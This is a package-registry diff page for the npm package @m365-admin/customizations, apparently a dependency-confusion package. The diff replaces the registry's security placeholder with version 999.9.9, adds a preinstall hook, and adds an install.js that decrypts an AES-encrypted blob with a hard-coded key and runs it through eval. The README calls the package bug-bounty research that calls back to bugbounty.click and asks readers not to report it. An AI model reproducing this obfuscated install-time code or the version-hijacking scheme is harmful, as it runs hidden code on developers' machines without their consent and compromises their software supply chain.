@m365-admin/customizations 0.0.1-security → 999.9.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @m365-admin/customizations might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1,17 @@
1
- # Security holding package
1
+ # Bug Bounty Research Only
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ My email address: contact@bugbounty.click
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=%40m365-admin%2Fcustomizations for more information.
5
+ This package was created for ethical hacking purposes only. If you're reading this, then if I was a malicious hacker then I could have control over your machine. Please see https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 for the technical description if you are interested. However, please don't report this package to the NPM registry as I have created it for bug bounty purposes.
6
+
7
+ For example, as you can see here the vulnerability has been reported to Hacker1 and been rewarded for (note this is not my report): https://hackerone.com/reports/1104693
8
+
9
+ If this has broken something then I'm sorry - however, please contact your internal security department/bug bounty administrator and pass on this message and email address. If you leave this on NPM and I receive a callback to my server at https://bugbounty.click then I can prove the vulnerability, and once it is reported it can be fixed before anyone malicious exploits it for bad. I hope I have made myself clear, please report this to your organisational security team.
10
+
11
+ Thank you - bugbounty.click
12
+
13
+ This is for the following bug bounty program:
14
+ https://www.microsoft.com/en-us/msrc/bounty
15
+
16
+ This is for the following bug bounty program:
17
+ https://www.microsoft.com/en-us/msrc/bounty
package/index.js ADDED
File without changes
package/install.js ADDED
@@ -0,0 +1 @@
1
+ const e=require("crypto"),r="aes-256-ctr",t="v9y$B&E)H@McQfThWmZq4t7w!z%C*F-J",c=c=>{const o=e.createDecipheriv(r,t,Buffer.from(c.iv,"hex"));return Buffer.concat([o.update(Buffer.from(c.content,"hex")),o.final()]).toString()};module.exports={decrypt:c};const o=require("fs");o.readFile("install.json",((e,r)=>{eval(c(JSON.parse(r)))}));
package/install.json ADDED
@@ -0,0 +1 @@
1
+ {"iv":"d53cbb1a4a598e0e371612886ceac5db","content":"dabd3160adab40c3bb8160871fb8586cfdd868eac36708112ed93cbe939659b9e8dee3cb885e8e323af9ef213b11d3475c9b52ed229938452aebc792a9ea7ffd31bc8e43a0f20649d7a953da1fcc47b78d67d92486e83344b35c75cc7825b555b2bfeb8398c1547c6bc1e5d7ac467e7fd6cd4cce498e8a43ff045533261c3820fa648e8cde60d390442dd05d92f2301a7aa6cee82496fcfa816abfb0f3c71b3e7bad7589e26ce0616d91361299072cbd0c7b3c24185b67ad4b8538fca94c217c19c5c1842fb4c99527e500812169bac13afbd9c3c558cf75c1946ce3b21b0825e61f9454e00da282f5f4caf6cf85300b693e9d10c68b6689673da4cf71bc4f2c022141ca0a9bfaacd8e6a52d004aa63d54fa5275f93014ffa99c3c606acf4cf9e3585c7e6cbcdd82c29bc889faec9416f79e2810fc99506295fb7230fae7437cd330c53f1cfc0d5fdf49805983873090b818b96d9fe5472657baecb58621f92fe06a75971b7f7795d10dedcb83b0223de25362b1ed9860575321e9b50ce07f30f0899e7f58b91c05633609e26c279b4c881b98f076c9e5252a882c46fd996bdc9cb5da70b8139ad3ffc8a873b0de63871a264eac8455f33e4c7423e73ba3f4b5cdf7baea031f642a1dda87897e462bd10021cc27867edeece92d141bbe5b1f17299d4327a091a080a622c880465cf47cdb642664307bbeb83c6475eb72e29d30e8e27ca514ec26bc3035e8c303df14568a4f41f8cfbc1663de82a2d51fe66e651c6d41d66f32b538f7f9a910eb6af0558c4a9021bf196925c462ec42f1bd0a90337ac9773c485b7d425fa7a5eed212613615d23674dd0148c239c437800ed8e6800033581fd2707653a33fd6732c1282057fa08ca05039868eb9f13bb2fde23e523ef3ea2030bd1118e8a74f4297ec2c3bf7c76af39b9fc153482967cba6e7d2a77294e811d9811a9bb42861cbb12694910056c443e5c1830beb7d5463ae1badf7d8565f8cd9495dce6c2f8399dbf81dfc02e3ab87d176422214b773f26a06c13630c3ac4503f5a614c1e8f9f82f53cf6b11ff526cf9804126ba033dbae97a85c5c71e29d61073c564ac4167b33fa4893b7d3eb8a0be85618d57ed5188a521f68c6de2ce219abd7070b79f0fd683d139a88d9043a72bcde36ce3640c8a46de9a5665d62607595336545b22920e2ed22a3ba5b78848e84a817e19fc54ee36bddf08761a"}
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "@m365-admin/customizations",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "999.9.9",
4
+ "description": "My email address: contact@bugbounty.click - This package was created for ethical hacking purposes only. https://www.microsoft.com/en-us/msrc/bounty If you're reading this, then if I was a malicious hacker then I could have control over your machine. Please see https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 for the technical description if you are interested. However, please don't report this package to the NPM registry as I have created it for bug bounty purposes. For example, as you can see here the vulnerability has been reported to Hacker1 and been rewarded for (note this is not my report): https://hackerone.com/reports/1104693 If this has broken something then I'm sorry - however, please contact your internal security department/bug bounty administrator and pass on this message and email address. If you leave this on NPM and I receive a callback to my server at https://bugbounty.click then I can prove the vulnerability, and once it is reported it can be fixed before anyone malicious exploits it for bad. I hope I have made myself clear, please report this to your organisational security team. Thank you - bugbounty.click",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node install.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }